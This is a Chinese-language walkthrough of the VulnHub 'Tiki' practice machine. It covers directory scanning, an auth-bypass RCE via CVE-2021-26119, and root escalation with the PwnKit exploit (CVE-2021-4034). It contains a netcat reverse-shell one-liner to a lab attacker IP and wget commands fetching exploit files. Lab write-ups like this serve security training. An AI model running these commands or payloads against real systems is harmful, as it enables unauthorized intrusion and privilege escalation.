vulnhub-Tiki - 类oscp靶机攻略1
vulnhub-Tiki
Date: 07/14/2022
Difficulty: Easy
Tags: CVE-2021-26119, CVE-2021-4034, Tiki CMS, sudo -l
https://www.vulnhub.com/entry/tiki_1,525/
信息搜集
端口扫描
目录扫描
➜ ~ dirsearch -u http://192.168.31.138
[06:15:28] Starting:
[06:15:30] 403 - 279B - /.ht_wsr.txt
[06:15:30] 403 - 279B - /.htaccess.orig
[06:15:30] 403 - 279B - /.htaccess.bak1
[06:15:30] 403 - 279B - /.htaccessBAK
[06:15:30] 403 - 279B - /.htaccess_sc
[06:15:30] 403 - 279B - /.htaccess.save
[06:15:30] 403 - 279B - /.htaccess.sample
[06:15:30] 403 - 279B - /.htaccessOLD
[06:15:30] 403 - 279B - /.htaccess_orig
[06:15:30] 403 - 279B - /.htaccessOLD2
[06:15:30] 403 - 279B - /.html
[06:15:30] 403 - 279B - /.htpasswds
[06:15:30] 403 - 279B - /.htm
[06:15:30] 403 - 279B - /.htpasswd_test
[06:15:30] 403 - 279B - /.httr-oauth
[06:15:31] 403 - 279B - /.php
[06:15:31] 403 - 279B - /.htaccess_extra
[06:15:59] 200 - 11KB - /index.html
[06:16:11] 200 - 42B - /robots.txt
[06:16:11] 403 - 279B - /server-status
[06:16:11] 403 - 279B - /server-status/
[06:16:16] 200 - 526B - /tiki/doc/stable.version
在 robots.txt 中扫出
加上再次扫描得到版本信息
http://192.168.31.138/tiki/changelog.txt
方法一
2022年tiki cms 出了新的漏洞,所以能一键利用了
https://srcincite.io/pocs/cve-2021-26119.py.txt
验证
➜ Tiki python3 exp.py 192.168.31.138 /tiki id
(+) blanking password...
(+) admin password blanked!
(+) getting a session...
(+) auth bypass successful!
(+) triggering rce...uid=33(www-data) gid=33(www-data) groups=33(www-data)
反弹shell
➜ Tiki python3 exp.py 192.168.31.138 /tiki "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.31.134 1234 >/tmp/f"
(+) blanking password...
(+) admin password blanked!
(+) getting a session...
(+) auth bypass successful!
(+) triggering rce...
提权
git clone https://github.com/berdav/CVE-2021-4034.gitpython3 -m http.server 80
wget 192.168.31.134/cve-2021-4034.c
wget 192.168.31.134/Makefile
wget 192.168.31.134/pwnkit.c
wget 192.168.31.134/pwnkit.so
www-data@ubuntu:/tmp$ make
make
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
www-data@ubuntu:/tmp$ ls
lsCVE-2021-4034.git cve-2021-4034 gconv-modules pwnkit.so
'GCONV_PATH=.' cve-2021-4034.c linpeas.sh pwnkit.so.1Makefile f pwnkit.c
www-data@ubuntu:/tmp$ ./cve-2021-4034
./cve-2021-4034
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
方法二
➜ ~ searchsploit tiki 21
----------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
Tiki Wiki CMS Groupware 21.1 - Authentication Bypass | php/webapps/48927.py
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
跑脚本,burp登录后使用 cookie 在网页登录得到账号密码
sudo su 得到 root
vulnhub-Tiki - 类oscp靶机攻略1相关推荐
- 漏洞payload 靶机_hackme:2 靶机攻略
原标题:hackme:2 靶机攻略 0x01 背景: hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中.内容丰富,贴近实战.而且没有太多的脑洞,适合安全工作者们用来练习渗 ...
- Hack Me Please靶机攻略
hack me please靶机攻略 首先进行主机发现 信息收集 扫描开放的端口 nmap -p- -sS -O -sV -sC -A -T4 192.168.237.197 -oN nmap.A 访 ...
- OSCP 2021攻略之旅--从小白到通过
1.背景 本文提供给0基础小白,指导其如何学习通过OSCP. 本人CS硕士毕业,毕业后加入一家网络安全公司一直做传统网络安全产品研发工作(FW/IDS/IPS/WAF/scanner).现任谋厂研究员 ...
- delphi添加类文件_SpringBoot攻略三、配置文件说明
自动配置 SpringBoot启动的时候加载主配置类(@SpringBootApplication注解修饰), @SpringBootApplication开启了自动配置功能 @EnableAutoC ...
- iOS 直播类,交友类,陪玩类 app 上架攻略
昨天,我发了一篇关于社交app的吐槽分享,今天上午就有位做陪玩类的开发者来跟我聊最近这段时间陪玩,直播,交友类app的趋势.他也很热心,将自己去年的陪玩app上架应用商店的经历分享给我,经过他的同意, ...
- 社交娱乐类APP出海攻略
据数据研究机构艾瑞咨询发布的<2022年移动应用出海趋势洞察白皮书>显示,中国娱乐类APP出海呈现井喷式收入增长,仅2021年,中国娱乐类应用软件出海收入就增长了204%.如此广阔向好的出 ...
- 饥荒怎么修改创建好的服务器,联机版饥荒创建世界后怎么再次修改设置 | 手游网游页游攻略大全...
发布时间:2016-02-15 存档保存位置是?很多玩家对此并不是很了解,不过别着急哟,下面99单机小编就为你带来高玩分享的相关技巧心得攻略,希望大家能喜欢. 联机版的存档与单机版是不同的,由于联机版 ...
- Vulnhub靶机Wakanda渗透测试攻略
前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...
- Java虚拟机调用jni_JNI攻略之十一――启动虚拟机调用java类
JNI攻略之十一――启动虚拟机调用java类 江苏无锡缪小东 一.一个简单的java程序 下面是一个简单的java程序!主要是供虚拟机直接调用的!我们可以编写任意的java程序,然后在c中调用虚拟机执 ...
- Dataset:fetch_20newsgroups(20类新闻文本)数据集的简介、安装、使用方法之详细攻略
Dataset:fetch_20newsgroups(20类新闻文本)数据集的简介.安装.使用方法之详细攻略 目录 fetch_20newsgroups(20类新闻文本)数据集的简介 1.数据集信息 ...
最新文章
- 冒泡排序算法_PHP冒泡排序算法(一)
- poj3111 选取物品(二分+贪心)
- mysql 宽容模式_SELinux 宽容模式(permissive) 强制模式(enforcing) 关闭(disabled)
- python-opencv实现简单的车牌定位
- python的shutil模块是内置的_python内置模块~shutil
- 如何用 NAS 搭建属于自己的云端书库 | 极客分享第 32 期
- Android 开发 DNK开发将.c文件打包成os
- 实现Web前端 live2dw小人物的显示
- SEO关键词之选取策略及具体方法
- Ubuntu 编译ijkplayer 支持几乎所有格式(MP4,mov,mkv,avi,wmv,m4v,mpg,webm,ogv,3g2.flv,f4v,swf)和https
- 游戏编程笔记-起步(一)一个简单的游戏-贪吃蛇
- 清除H5的浏览器缓存
- 基于ZigBee的出租车调度系统
- 两条命令让你的git轻松自动变基,学到了!
- Vue中的@blur事件
- Linux 驱动开发 三:字符设备驱动框架
- 基于Web的系统测试方法(张友生(来自中国系统分析师/中国系统分析员))
- Oracle分页查询的两种方法
- 报错“未能创建类型‘xxx’
- 佛山科学技术学院计算机期末试题,高等数学 A佛山科学技术学院期终考试试题.doc...